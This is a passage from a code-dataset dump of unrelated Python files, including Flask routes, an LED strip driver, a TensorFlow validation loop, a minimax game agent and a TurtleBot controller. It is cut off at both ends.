})\n\n\n@operations.route('/autocomplete_translate', methods=['GET'])\ndef autocomplete_translate():\n \"\"\"\n Called by jQueryUI autocomplete widget in ../static/js/translate.js\n to assist in searching up valid terms for translation\n \"\"\"\n\n terms = APP.config[\"MongoHandler\"].get_partial_record(\n request.args['term'], all_fields=True)\n\n return jsonify(matched=terms)\n\n\n@operations.route('/autocomplete_editor', methods=['GET'])\ndef autocomplete_editor():\n \"\"\"\n Called by jQueryUI autocomplete widget in ../static/js/editor.js\n to assist in searching up valid primary keys\n \"\"\"\n terms = APP.config[\"MongoHandler\"].get_partial_record(\n request.args['term'], all_fields=False)\n\n return jsonify(matched=terms)\n\n\n@operations.app_errorhandler(ServerSelectionTimeoutError)\n@operations.app_errorhandler(InvalidName)\ndef handle_error(error):\n message = [str(x) for x in error.args]\n status_code = 500\n success = False\n response = {\n 'success': success,\n 'error': {\n 'type': error.__class__.__name__,\n 'message': message\n }\n }\n\n return jsonify(response), status_code\n","sub_path":"id_translator/blueprints/operations_gsc.py","file_name":"operations_gsc.py","file_ext":"py","file_size_in_byte":15136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"224695325","text":"import RPi.GPIO as GPIO, time\n\nclass LedDriver:\n\t\n\tdef Color(self, r, g, b):\n\t\treturn ((r & 0xFF) << 16) | ((g & 0xFF) << 8) | (b & 0xFF)\n\t\n\tdef writeStrip(self, pixels):\n\t\tspidev = file(\"/dev/spidev0.0\", \"w\")\n\t\tfor i in range(len(pixels)):\n\t\t\tspidev.write(chr((pixels[i]>>16) & 0xFF))\n\t\t\tspidev.write(chr((pixels[i]>>8) & 0xFF))\n\t\t\tspidev.write(chr(pixels[i] & 0xFF))\n\t\tspidev.close()\n\t\ttime.sleep(0.002)\t\n\t\n\tdef setPixelColor(self, pixels, n, r, g, b):\n\t\tif (n >= len(pixels)):\n\t\t\treturn\n\t\tpixels[n] = self.Color(r,g,b)\n\t\n\tdef clearStrip(self, pixels):\n\t\tfor i in range(len(pixels)):\n\t\t\tself.setPixelColor(pixels, i, 0,0,0)\n\t\tself.writeStrip(pixels)","sub_path":"LedDriver.py","file_name":"LedDriver.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"175552817","text":"from django.core.management.base import BaseCommand, CommandError\nfrom helloworld.models import Entity\n\nclass Command(BaseCommand):\n help = 'Shows the Hello message for a given entity_id'\n\n def add_arguments(self, parser):\n parser.add_argument('entity_id', type=int)\n\n def handle(self, *args, **options):\n entity_id = options['entity_id']\n try:\n entity = Entity.objects.get(pk=entity_id)\n except Entity.DoesNotExist:\n raise CommandError('Entity with id {} does not exist'.format(entity_id))\n\n self.stdout.write(self.style.SUCCESS('Hello {}'.format(entity.name)))\n","sub_path":"interview/helloworld/management/commands/hello_entity.py","file_name":"hello_entity.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"520128541","text":"# coding:utf-8\nimport time\nimport tensorflow as tf\nimport fer_forward\nimport backward\nimport fer_generator\nimport numpy as np\nimport fer_config as config\n\nTEST_INTERVAL_SECS = 5\nTOTAL_TEST_NUM = 3589\nMINI_BATCH = 300#分批测试的话,注意多线程问题。保证是多线程,才能每次确实shuffle拿出了不一样的数据。所以线程在外,循环在内\n\n\n#3589,test下标从0~3588,valid同样是0~3588\n#这里边没用valid数据集,严格讲,以valid数据集为准,向test数据集泛化。\n#需要使用valid和test同时处理过拟合问题的话,手动改一下数据文件来源。\n\n#更多可以选的操作,把train和valid放一起,交叉验证。\n\n\n\n\n\n\ndef test():\n # 实例化一个数据流图并作为整个 tensorflow 运行环境的默认图\n with tf.Graph().as_default() as g:\n x = tf.placeholder(tf.float32, [MINI_BATCH, config.img_width,\n config.img_height, fer_forward.NUM_CHANNELS])\n y_ = tf.placeholder(tf.float32, [None, fer_forward.OUTPUT_NODE])\n\n prob = tf.placeholder(tf.float32)\n bn_training = tf.placeholder(tf.bool)\n # y = fer_forward.forward(x, keep_prob=prob)\n y, dict_ret = fer_forward.forward(x, keep_prob=prob, bn_enable=True, bn_training=bn_training)\n\n \n ema = tf.train.ExponentialMovingAverage(backward.MOVING_AVERAGE_DECAY)\n ema_restore = ema.variables_to_restore()#生成ema替代原变量的映射关系。\n \n\n loader = tf.train.Saver(ema_restore)\n\n correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1))\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n # 批量获取测试数据\n img_batch, label_batch = fer_generator.get_tfrecord(MINI_BATCH, config.tfRecord_valid)\n for i in range(3):\n # 创建一个会话\n with tf.Session() as sess:\n # 通过checkpoint文件找到模型文件名\n ckpt = tf.train.get_checkpoint_state(config.MODEL_SAVE_PATH)\n # 如果模型存在\n if ckpt and ckpt.model_checkpoint_path:\n\n loader.restore(sess, ckpt.model_checkpoint_path)\n global_step = ckpt.model_checkpoint_path.split('/')[-1].split('-')[-1]\n\n # 创建一个线程协调器\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(sess=sess, coord=coord)\n\n \n iterations = int(TOTAL_TEST_NUM / MINI_BATCH)\n total_accuracy_score = 0\n for i in range(iterations):\n xs, ys = sess.run([img_batch, label_batch])#一定要把这步扔到循环内部。\n # reshape测试输入数据xs\n reshape_xs = np.reshape(xs, (MINI_BATCH,\n config.img_width,\n config.img_height,\n fer_forward.NUM_CHANNELS))\n\n accuracy_score = sess.run(accuracy, feed_dict={x: reshape_xs, y_: ys, prob:1.0, bn_training:False})\n\n print(\"%g\" % (accuracy_score),end=', ')\n total_accuracy_score += accuracy_score\n \n\n # 输出global_step和准确率\n print(\"After %s training step(s), test accuracy = %g\" % (global_step, total_accuracy_score / iterations))\n # 终止所有线程\n coord.request_stop()\n coord.join(threads)\n\n else:\n print('No checkpoint file found')\n return\n time.sleep(TEST_INTERVAL_SECS)\n\n\ndef main():\n test()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"fer_valid.py","file_name":"fer_valid.py","file_ext":"py","file_size_in_byte":3918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"500211986","text":"import time\nfrom random import randrange\n\n\n# for i in range(0, count):\n# numbers.append(randrange(1, 100, 1))\n\n# print(f'Unsorted array: {numbers} /n')\n\n#bubble sort\n\nnumbers = [14, 21, 58, 1, 2, 54]\nn = len(numbers)\n\nfor i in range(0, n-1):\n swapped = False\n\n for j in range(0, n-i-1):\n if numbers[j] > numbers[j+1]:\n numbers[j], numbers[j+1] = numbers[j+1], numbers[j] \n swapped = True\n\n if swapped == False: \n break\n \nprint(numbers)\nfor i in range(0, n):\n print(numbers[i])","sub_path":"console.py","file_name":"console.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"571743775","text":"\"\"\"ex_03.\n\nUsage:\n ex_03 disks [-j]\n ex_03 each_disk [-j]\n\nArguments:\n disks\n\nOptions:\n -j Show response body(json)\n\n\"\"\"\n\nimport sys\nfrom docopt import docopt\nimport simplejson as json\nfrom vxrail_interface_3c import VxrailInterface, VxrailError\n\n\ndef print_helper(title, data, pretty=False):\n print(f\"\\n{title}\")\n print(\"-\".rjust(len(title), \"-\"))\n if pretty:\n print(json.dumps(data, indent=4, sort_keys=False))\n else:\n print(data)\n\n\ndef main():\n \"\"\"The excessive commenting in not Pythonic.\"\"\"\n args = docopt(__doc__)\n\n #Instantiate the class\n\n # Step 15\n api = VxrailInterface(address=\"127.0.0.1\", port=8443, username=\"test\", password=\"test\")\n\n # Step 17\n # api = VxrailInterface(address=\"127.0.0.1\", port=8443, username=\"test\", password=\"badpassword\")\n\n if args['disks']:\n\n # Make the API call\n try:\n # Step 19a\n results = api.get(\"v1/disks\")\n\n # Step 19b\n # results = api.get(\"v1/system1234\")\n\n except VxrailError as err: \n sys.exit(err)\n\n # Show response body(json)\n print_helper(\"Response body(json)\", results, pretty=args['-j'])\n\n\n elif args['each_disk']:\n print(\"To be completed by attendees.\")\n \n \"\"\" Attendee notes.\n\n - Start with GET v1/disks\n - Extract 'sn' for each disk\n - Use GET v1/disks{disk_sn} on subsequent calls.\n \"\"\"\n\n\nif __name__ == \"__main__\":\n main()\n \n","sub_path":"sessions/session_01/ex_03c.py","file_name":"ex_03c.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"639148333","text":"# coding: utf-8\n\"\"\"Definition of the `Relationship` class.\n\"\"\"\nfrom __future__ import unicode_literals\nfrom __future__ import absolute_import\n\nimport collections\nimport six\n\nfrom .utils import unique_everseen, output_str\n\n\nclass Relationship(object):\n \"\"\"A Relationship object.\n\n The Relationship class actually behaves as a factory, creating new\n relationships via the default Python syntax only if no relationship\n of the same name are present in the class py:attribute:: _instances\n (a dictionnary containing memoized relationships).\n\n\n Note:\n Relationships are pickable and always refer to the same adress even\n after being pickled and unpickled, but that requires to use at least\n pickle protocol 2 (which is not default on Python 2, so take care !)::\n\n >>> import pronto\n >>> import io, pickle\n >>>\n >>> src = io.BytesIO()\n >>> p = pickle.Pickler(src, pickle.HIGHEST_PROTOCOL)\n >>>\n >>> isa = pronto.Relationship('is_a')\n >>> isa_id = id(isa)\n >>>\n >>> p.dump(isa)\n >>> dst = io.BytesIO(src.getvalue())\n >>>\n >>> u = pickle.Unpickler(dst)\n >>> new_isa = u.load()\n >>>\n >>> id(new_isa) == isa_id\n True\n >>> # what's that black magic ?!\n\n \"\"\"\n\n _instances = collections.OrderedDict()\n\n def __init__(self, obo_name, symmetry=None, transitivity=None,\n reflexivity=None, complementary=None, prefix=None,\n direction=None, comment=None, aliases=None):\n \"\"\"Instantiate a new relationship.\n\n Arguments:\n obo_name (str): the name of the relationship as it appears\n in obo files (such as is_a, has_part, etc.)\n symetry (bool or None): the symetry of the relationship\n transitivity (bool or None): the transitivity of the relationship.\n reflexivity (bool or None): the reflexivity of the relationship.\n complementary (string or None): if any, the obo_name of the\n complementary relationship.\n direction (string, optional): if any, the direction of the\n relationship (can be 'topdown', 'bottomup', 'horizontal').\n A relationship with a direction set as 'topdown' will be\n counted as _childhooding_ when acessing `Term.children`.\n comment (string, optional): comments about the relationship.\n aliases (list, optional): a list of names that are synonyms to\n the obo name of this relationship.\n\n Note:\n For symetry, transitivity, reflexivity, the allowed values are\n the following:\n\n * `True` for reflexive, transitive, symmetric\n * `False` for areflexive, atransitive, asymmetric\n * `None` for non-reflexive, non-transitive, non-symmetric\n\n \"\"\"\n if obo_name not in self._instances:\n\n if not isinstance(obo_name, six.text_type):\n obo_name = obo_name.decode('utf-8')\n if complementary is not None and not isinstance(complementary, six.text_type):\n complementary = complementary.decode('utf-8')\n if prefix is not None and not isinstance(prefix, six.text_type):\n prefix = prefix.decode('utf-8')\n if direction is not None and not isinstance(direction, six.text_type):\n direction = direction.decode('utf-8')\n if comment is not None and not isinstance(comment, six.text_type):\n comment = comment.decode('utf-8')\n\n self.obo_name = obo_name\n self.symmetry = symmetry\n self.transitivity = transitivity\n self.reflexivity = reflexivity\n self.complementary = complementary or ''\n self.prefix = prefix or ''\n self.direction = direction or ''\n self.comment = comment or ''\n if aliases is not None:\n self.aliases = [alias.decode('utf-8') if not isinstance(alias, six.text_type) else alias\n for alias in aliases]\n else:\n self.aliases = []\n\n self._instances[obo_name] = self\n for alias in self.aliases:\n self._instances[alias] = self\n\n def complement(self):\n \"\"\"Return the complementary relationship of self.\n\n Raises:\n ValueError: if the relationship has a complementary\n which was not defined.\n\n Returns:\n complementary (Relationship): the complementary relationship.\n\n Example:\n\n >>> from pronto.relationship import Relationship\n >>> print(Relationship('has_part').complement())\n Relationship('part_of')\n >>> print(Relationship('has_units').complement())\n None\n\n \"\"\"\n if self.complementary:\n\n #if self.complementary in self._instances.keys():\n try:\n return self._instances[self.complementary]\n except KeyError:\n raise ValueError('{} has a complementary but it was not defined !')\n\n else:\n return None\n\n @output_str\n def __repr__(self):\n \"\"\"Return a string reprensentation of the relationship.\n \"\"\"\n return \"Relationship('{}')\".format(self.obo_name)\n\n def __new__(cls, obo_name, *args, **kwargs):\n \"\"\"Create a relationship or returning an already existing one.\n\n This allows to do the following:\n\n >>> Relationship('has_part').direction\n u'topdown'\n\n The Python syntax is overloaded, and what looks like a object\n initialization in fact retrieves an existing object with all its\n properties already set. The Relationship class behaves like a\n factory of its own objects !\n\n Todo:\n * Add a warning for unknown relationship (the goal being to\n instantiate every known ontology relationship and even\n allow instatiation of file-defined relationships).\n\n \"\"\"\n if obo_name in cls._instances:\n return cls._instances[obo_name]\n else:\n return super(Relationship, cls).__new__(cls)\n\n @classmethod\n def topdown(cls):\n \"\"\"Get all topdown `Relationship` instances.\n\n Returns:\n :obj:`generator`\n\n Example:\n\n >>> from pronto import Relationship\n >>> for r in Relationship.topdown():\n ... print(r)\n Relationship('can_be')\n Relationship('has_part')\n\n \"\"\"\n return tuple(unique_everseen(r for r in cls._instances.values() if r.direction=='topdown'))\n\n @classmethod\n def bottomup(cls):\n \"\"\"Get all bottomup `Relationship` instances.\n\n Example:\n\n >>> from pronto import Relationship\n >>> for r in Relationship.bottomup():\n ... print(r)\n Relationship('is_a')\n Relationship('part_of')\n\n \"\"\"\n return tuple(unique_everseen(r for r in cls._instances.values() if r.direction=='bottomup'))\n\n def __getnewargs__(self):\n return (self.obo_name,)\n\n @classmethod\n def _from_obo_dict(cls, d):\n\n if d['id'] in cls._instances:\n return cls._instances[d['id']]\n\n try:\n complementary = d['inverse_of']\n except KeyError:\n complementary = \"\"\n\n try:\n transitivity = d['is_transitive'].lower() == \"true\"\n except KeyError:\n transitivity = None\n\n try:\n symmetry = d['is_symmetric'].lower() == \"true\"\n except KeyError:\n symmetry = None\n\n try:\n reflexivity = d['is_reflexive'].lower() == \"true\"\n except KeyError:\n reflexivity = None\n\n try:\n symmetry = d['is_antisymetric'].lower() == \"false\"\n except KeyError:\n pass\n\n return Relationship(d['id'], symmetry=symmetry, transitivity=transitivity,\n reflexivity=reflexivity, complementary=complementary)\n\n\n\nRelationship('is_a', symmetry=False, transitivity=True,\n reflexivity=True, complementary='can_be',\n direction='bottomup')\n\nRelationship('can_be', symmetry=False, transitivity=True,\n reflexivity=True, complementary='is_a',\n direction='topdown')\n\nRelationship('has_part', symmetry=False, transitivity=True,\n reflexivity=True, complementary='part_of',\n direction='topdown')\n\nRelationship('part_of', symmetry=False, transitivity=True,\n reflexivity=True, complementary='has_part',\n direction='bottomup', aliases=['is_part'])\n\nRelationship('has_units', symmetry=False, transitivity=False,\n reflexivity=None)\n\nRelationship('has_domain', symmetry=False, transitivity=False)\n","sub_path":"parsing/pronto_tools/pronto-0.10.2/pronto/relationship.py","file_name":"relationship.py","file_ext":"py","file_size_in_byte":9037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"89312729","text":"#The Riddler Express 2017-08-04: Special Hot Potato\n#Monte Carlo simulation\n\nimport random\n\nNsim = 100000 #Number of simulations\n\nn_children = 30 #Number of children\n\ncounts = [0]*(n_children) #Count how many times each child won\n\nfor x in range(Nsim):\n held_potato = [0]*(n_children + 1) #Tracker whether a child has held potato\n pos = 0 #Potato starts from teacher\n held_potato[0] = -1 #Teacher is a sentinel\n\n #While there is more than 1 child who hasn't held potato\n #(note that teacher counts as a -1 in the sum)\n while (sum(held_potato) < n_children - 2):\n #Simulate coin flip and potato going left or right\n #Wrap around circle using modulo arithmetic\n if (random.random() < 0.5):\n pos = (pos - 1)%(n_children + 1)\n else:\n pos = (pos + 1)%(n_children + 1)\n\n #Update child holding potato excluding teacher\n if (pos != 0):\n held_potato[pos] = 1\n\n counts[held_potato.index(0) - 1] += 1\n\n#Print empirical probabilities\nprint([i/Nsim for i in counts])\n","sub_path":"express/special_hot_potato.py","file_name":"special_hot_potato.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"268313171","text":"import numpy as np\nfrom metrics import BaseMetric\n\n\nclass QueryMeanPrecision(BaseMetric):\n\n def __init__(self, **kwargs):\n BaseMetric.__init__(self, **kwargs)\n\n def __call__(self):\n\n \"\"\"\n Definición:\n Mean Precision obtiene la media de la precisión de cada query. La precisión de una query es la cantidad de\n documentos 'true positive' (realmente relevantes), dividido por la cantidad de documentos obtenidos. Una\n precisión de 1 significa una precisión perfecta para la query.\n \"\"\"\n\n truth_relevance = self.parameters[\"truth_relevance\"]\n query_ids = self.parameters[\"q_id\"]\n\n # Obtener la cantidad de queries con al menos un documento relevante\n true_relevance_mask = (truth_relevance == 1)\n filtered_query_id = query_ids[true_relevance_mask]\n # en las queries con relevance, cuento\n filtered_true_relevance_count = np.bincount(filtered_query_id)\n # contar queries con 0 en queries sin documentos relevantes\n unique_query_ids = np.unique(query_ids)\n non_zero_count_idxs = np.where(filtered_true_relevance_count > 0)\n true_relevance_count = np.zeros(unique_query_ids.max() + 1)\n true_relevance_count[non_zero_count_idxs] = filtered_true_relevance_count[non_zero_count_idxs]\n # obtener el total solo para las queries existentes\n true_relevance_count_by_query = true_relevance_count[unique_query_ids]\n # obtener el total de documentos\n fetched_documents_count = np.bincount(query_ids)[unique_query_ids]\n # calcular la métrica\n precision_by_query = true_relevance_count_by_query / fetched_documents_count\n return np.mean(precision_by_query)\n","sub_path":"notebooks/tpintegrador/src/avg_q_precision.py","file_name":"avg_q_precision.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"333697539","text":"\nfrom agent import Agent\nimport minimax\n\n\"\"\"\nAgent skeleton. Fill in the gaps.\n\"\"\"\n\n\nclass MyAgent(Agent):\n\n \"\"\"This is the skeleton of an agent to play the Penguin game.\"\"\"\n\n def get_action(self, state, time_left):\n \"\"\"This function is used to play a move according\n to the board, player and time left provided as input.\n It must return an action representing the move the player\n will perform.\n \"\"\"\n return minimax.search(state, self)\n\n def successors(self, state):\n \"\"\"The successors function must return (or yield) a list of\n pairs (a, s) in which a is the action played to reach the\n state s;\n \"\"\"\n for action in state.get_current_player_actions():\n copied_state = state.copy()\n copied_state.apply_action(action)\n yield (action, copied_state)\n\n def cutoff(self, state, depth):\n \"\"\"The cutoff function returns true if the alpha-beta/minimax\n search has to stop; false otherwise.\n \"\"\"\n return depth >= 2 or state.game_over()\n\n def evaluate(self, state):\n \"\"\"The evaluate function must return an integer value\n representing the utility function of the board.\n \"\"\"\n if state.placement_phase:\n sum = 0\n for i in range(0, len(state.penguins)):\n for j in range(0, len(state.penguins[i])):\n if state.penguins[i][j] == self.id:\n for k in range(0, len(state.fish[i])):\n sum += state.fish[i][k]\n return sum\n\n scores = state.get_scores()\n other = (self.id + 1) % 2\n return scores[self.id] - scores[other]\n\n def get_name(self):\n return 'Eggsy'\n","sub_path":"tournament_agent.py","file_name":"tournament_agent.py","file_ext":"py","file_size_in_byte":1773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"641989487","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Uses https://github.com/rkistner/contest-algorithms\n\nimport sys\n\n\ndef debug(*args):\n print(*args, file=sys.stderr)\n\nfin = sys.stdin\nT = int(fin.readline())\nfor case in range(1, T + 1):\n line = fin.readline().strip() + '+'\n last = line[0]\n count = 0\n for c in line:\n if c != last:\n count += 1\n last = c\n\n print(\"Case #%d: %s\" % (case, count))\n\n","sub_path":"solutions_5634697451274240_0/Python/RalfKistner/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"123052637","text":"import rospy\r\nimport numpy as np\r\nfrom nav_msgs.msg import Odometry\r\nfrom geometry_msgs.msg import Twist\r\nfrom sensor_msgs.msg import LaserScan\r\nfrom tf.transformations import euler_from_quaternion\r\nfrom math import pi\r\nfrom array import *\r\n\r\n\r\nfrom angles import rectify_angle_pi\r\nfrom angles import degrees_to_radians\r\n\r\nfrom distances import euclidian_distance\r\n\r\n\r\ndef yaw_from_odom(msg):\r\n \"\"\"\r\n callback function to obtain yaw angle from odometry message\r\n \"\"\"\r\n orientation_q = msg.pose.pose.orientation\r\n orientation_vec = [orientation_q.x, orientation_q.y, orientation_q.z, orientation_q.w]\r\n (roll, pitch, yaw) = euler_from_quaternion(orientation_vec)\r\n\r\n return yaw\r\n\r\n\r\ndef findObj360(array):\r\n \"\"\"\r\n given an array of ranges, get the angle of the closest object around the robot\r\n \"\"\"\r\n temp = min(i for i in array if i > 0.0)\r\n return (array.index(temp), temp)\r\n\r\n\r\ndef findObjFront(array):\r\n \"\"\"\r\n given an array of ranges, get the angle of the closest object 90 degrees in front of robot \r\n (45 in each direction)\r\n \"\"\"\r\n temp = min(i for i in array[0:45] if i > 0.0)\r\n temp2 = min(i for i in array[315:360] if i > 0.0)\r\n\r\n if temp <= temp2:\r\n return (array[0:45].index(temp), temp)\r\n else:\r\n return (array[315:360].index(temp2) + 315, temp2)\r\n\r\ndef Hough_Transform(array):\r\n print(\"Entered Hough\")\r\n\r\n precision_t = 36\r\n precision_R = 100\r\n dist_min = .05\r\n dist_max = 4\r\n threshold = 400\r\n\r\n #Take all the ranges (and their corresponding angle) and convert to x,y coordinates for each point\r\n #make an array of 360 rows and 2 columns where each row is a point\r\n Cartesian = [[0 for col in range(2)] for row in range(360)]\r\n for i in range(360):\r\n Cartesian.insert(i, [array[i]*np.cos(np.deg2rad(i)),array[i]*np.sin(np.deg2rad(i))])\r\n\r\n\r\n #2D array which is #of discreet distances by # of discrete thetas\r\n lines = np.zeros((precision_R,precision_t))\r\n\r\n for i in range(360):\r\n for j in range(360):\r\n r = Cartesian[i][0]*np.cos(np.deg2rad(j)) + Cartesian[i][1]*np.sin(np.deg2rad(j))\r\n if (r > dist_min) & (r < dist_max):\r\n #integer division to put r/theta into a discrete box on the hough map\r\n r2 = (r-dist_min)/((dist_max-dist_min)/precision_R)\r\n x1 = np.deg2rad(j)\r\n x2 = (2*pi)/precision_t\r\n t = x1/x2\r\n\r\n lines[int(r2)][int(t)]+=1\r\n\r\n\r\n min_distance = dist_max\r\n angle_to_min = 0\r\n #If any of the squares in the map are above the threshold, they represent a line the robot detected\r\n for i in range(precision_R):\r\n #print{\" \"}\r\n for j in range(precision_t):\r\n #print(\"Box[{}][{}] - {}\").format(i,j,lines[i][j])\r\n if lines[i][j] > threshold:\r\n r = i*((dist_max-dist_min)/precision_R)+dist_min\r\n t = j*360/precision_t\r\n if r < min_distance:\r\n angle_to_min = t\r\n min_distance = r\r\n\r\n print(\"Line with coordinates ({},{}) in polar (degrees) cell value={}\").format(r,t,lines[i][j])\r\n # f = open(\"FileForDownload\", \"w\")\r\n # f.write(\"[\")\r\n # f.write(str(r))\r\n # f.write(\",\")\r\n # f.write(str(t))\r\n # f.write(str(lines[i][j]))\r\n # f.write(\"]\")\r\n # f.close()\r\n\r\n\r\n #Return the angle to the closest wall\r\n print(\"Returning the cloest wall: {}\").format(angle_to_min)\r\n return angle_to_min\r\n\r\n\r\n\r\n\r\nclass Turn:\r\n \"\"\"\r\n turn the robot by an angle defined in radians, if angle is defined as positive the robot will \r\n turn clockwise\r\n \"\"\"\r\n def __init__(self, state, angle):\r\n self.state = state\r\n\r\n if angle >= 0:\r\n self.clockwise = False\r\n else:\r\n self.clockwise = True\r\n \r\n self.target_angle = rectify_angle_pi(state.angle + angle)\r\n \r\n rospy.loginfo(\"Target angle: \" + str( self.target_angle))\r\n self.done = False\r\n\r\n def act(self):\r\n error = abs(self.target_angle - self.state.angle)\r\n rospy.loginfo(\"Current angle: \" + str( self.state.angle))\r\n\r\n if(error > .02):\r\n move_cmd = Twist()\r\n if self.clockwise:\r\n move_cmd.angular.z = -.2\r\n else:\r\n move_cmd.angular.z = .2\r\n self.state.cmd_vel.publish(move_cmd)\r\n\r\n else:\r\n self.state.cmd_vel.publish(Twist())\r\n self.done = True\r\n\r\n\r\nclass Drive:\r\n \"\"\"\r\n drive the robot by a certain distance in meters forwards or backwards. If the distance is\r\n negative, the robot will move backwards.\r\n \"\"\"\r\n def __init__(self, state, distance):\r\n self.state = state\r\n\r\n self.init_x = state.x\r\n self.init_y = state.y\r\n\r\n if distance >= 0:\r\n self.forward = True\r\n else:\r\n self.forward = False\r\n\r\n self.target_distance = abs(distance) \r\n rospy.loginfo(\"Distance to Travel: \" + str(self.target_distance))\r\n self.done = False\r\n\r\n def act(self):\r\n error = abs(self.target_distance - euclidian_distance(self.init_x, self.state.x, \r\n self.init_y, self.state.y))\r\n rospy.loginfo(\"Current x, y: \" + str( self.state.x) + str(self.state.y))\r\n\r\n if(error > .02):\r\n move_cmd = Twist()\r\n if self.forward:\r\n move_cmd.linear.x = .2\r\n else:\r\n move_cmd.linear.x = -.2\r\n self.state.cmd_vel.publish(move_cmd)\r\n\r\n else:\r\n self.state.cmd_vel.publish(Twist())\r\n self.done = True\r\n\r\n\r\nclass TurnToObject:\r\n \"\"\"\r\n the robot uses tha range finder to grab the direction of the closest object and rotate such \r\n that its heading angle points towards the closest object.\r\n \"\"\"\r\n def __init__(self, state):\r\n self.state = state\r\n self.done = False\r\n\r\n def act(self):\r\n goal = rectify_angle_pi(self.state.closest_obj_ang)\r\n rospy.loginfo(\"Angle of Closest Object: \" + str(goal))\r\n rospy.loginfo(\"Angle of Closest Object in Front: \" + str(rectify_angle_pi(\r\n self.state.closest_obj_front_ang)))\r\n\r\n self.state.current_action = Turn(self.state, goal)\r\n self.done = True\r\n\r\n\r\nclass FollowObject:\r\n \"\"\"\r\n the robot follows the closest object in front of it at an angle of +pi/2 and -pi/2 by sending\r\n angular and linear command velocities.\r\n \"\"\"\r\n def __init__(self, state):\r\n self.state = state\r\n\r\n # error and bound limit constants\r\n self.lower_bound = 0.4\r\n self.upper_bound = 0.6\r\n self.angle_err_lim = 0.04\r\n\r\n goal_angle = rectify_angle_pi(self.state.closest_obj_front_ang)\r\n\r\n if goal_angle >= 0:\r\n self.clockwise = False\r\n else:\r\n self.clockwise = True\r\n \r\n self.target_angle = rectify_angle_pi(self.state.angle + goal_angle)\r\n \r\n self.done = False\r\n\r\n def act(self):\r\n goal = rectify_angle_pi(self.state.closest_obj_front_ang)\r\n error = abs(self.target_angle - self.state.angle)\r\n\r\n move_cmd = Twist()\r\n\r\n # sends an angular command velocity if the current robot angle is off by .04 radians\r\n if(error > self.angle_err_lim):\r\n if self.clockwise:\r\n move_cmd.angular.z = -.4\r\n else:\r\n move_cmd.angular.z = .4\r\n else:\r\n move_cmd.angular.z = 0\r\n \r\n # sends a linear command velocity if the closest object distance is not between 0.4 and 0.6m\r\n if (self.state.closest_obj_front_dist > self.upper_bound or \r\n self.state.closest_obj_front_dist < self.lower_bound):\r\n if(self.state.closest_obj_front_dist - 0.5 > 0):\r\n move_cmd.linear.x = .15\r\n else:\r\n move_cmd.linear.x = -.15\r\n\r\n else:\r\n move_cmd.linear.x = 0\r\n\r\n self.state.cmd_vel.publish(move_cmd)\r\n\r\n # sends 0 command velocity if the robot is in a desired position\r\n if(error <= self.angle_err_lim and (self.state.closest_obj_front_dist <= self.upper_bound \r\n and self.state.closest_obj_front_dist >= self.lower_bound)):\r\n move_cmd = Twist()\r\n self.state.cmd_vel.publish(Twist())\r\n \r\n self.done = True \r\n\r\n\r\nclass WallFollow:\r\n def __init__(self, state):\r\n self.state = state\r\n\r\n # error and bound limit constants\r\n self.lower_bound = 0.9\r\n self.upper_bound = 1.1\r\n self.angle_err_lim = 0.04\r\n\r\n\r\n goal_angle = rectify_angle_pi(self.state.closest_obj_front_ang)\r\n\r\n if goal_angle >= 0:\r\n self.clockwise = False\r\n else:\r\n self.clockwise = True\r\n \r\n self.target_angle = rectify_angle_pi(self.state.angle + goal_angle)\r\n \r\n self.done = False\r\n\r\n def act(self):\r\n goal = rectify_angle_pi(self.state.closest_obj_front_ang)\r\n error = abs(self.target_angle - self.state.angle)\r\n\r\n move_cmd = Twist()\r\n\r\n if(error > self.angle_err_lim):\r\n if self.clockwise:\r\n move_cmd.angular.z = -.4\r\n else:\r\n move_cmd.angular.z = .4\r\n else:\r\n move_cmd.angular.z = 0\r\n \r\n if (self.state.closest_obj_front_dist > self.upper_bound or self.state.closest_obj_front_dist < self.lower_bound):\r\n if(self.state.closest_obj_front_dist - 0.5 > 0):\r\n move_cmd.linear.x = .15\r\n else:\r\n move_cmd.linear.x = -.15\r\n\r\n else:\r\n move_cmd.linear.x = 0\r\n\r\n self.state.cmd_vel.publish(move_cmd)\r\n print(str(error) + \"\\tERROR\")\r\n print(str(self.state.closest_obj_front_dist) + \"closest_obj_front_dist\")\r\n if(error <= self.angle_err_lim and (self.state.closest_obj_front_dist <= self.upper_bound and self.state.closest_obj_front_dist >= self.lower_bound)):\r\n move_cmd = Twist()\r\n print(\"setting meter to true GOTHERE\")\r\n self.state.cmd_vel.publish(Twist())\r\n self.state.meter = True\r\n \r\n self.done = True \r\n\r\n\r\nclass TurtlebotState:\r\n \"\"\"\r\n stores the current state of the robot.\r\n \"\"\"\r\n def __init__(self):\r\n\r\n self.pose_msg = None\r\n self.yaw_msg = None\r\n self.scan_msg = None\r\n\r\n self.dict = {\"position\":None, \"orientation\" : None, \"scan\" : None}\r\n\r\n # start up the subscribers to monitor state\r\n self.subscriber_odom = rospy.Subscriber(\"/odom\", Odometry, self.update_odom)\r\n self.subscriber_scan = 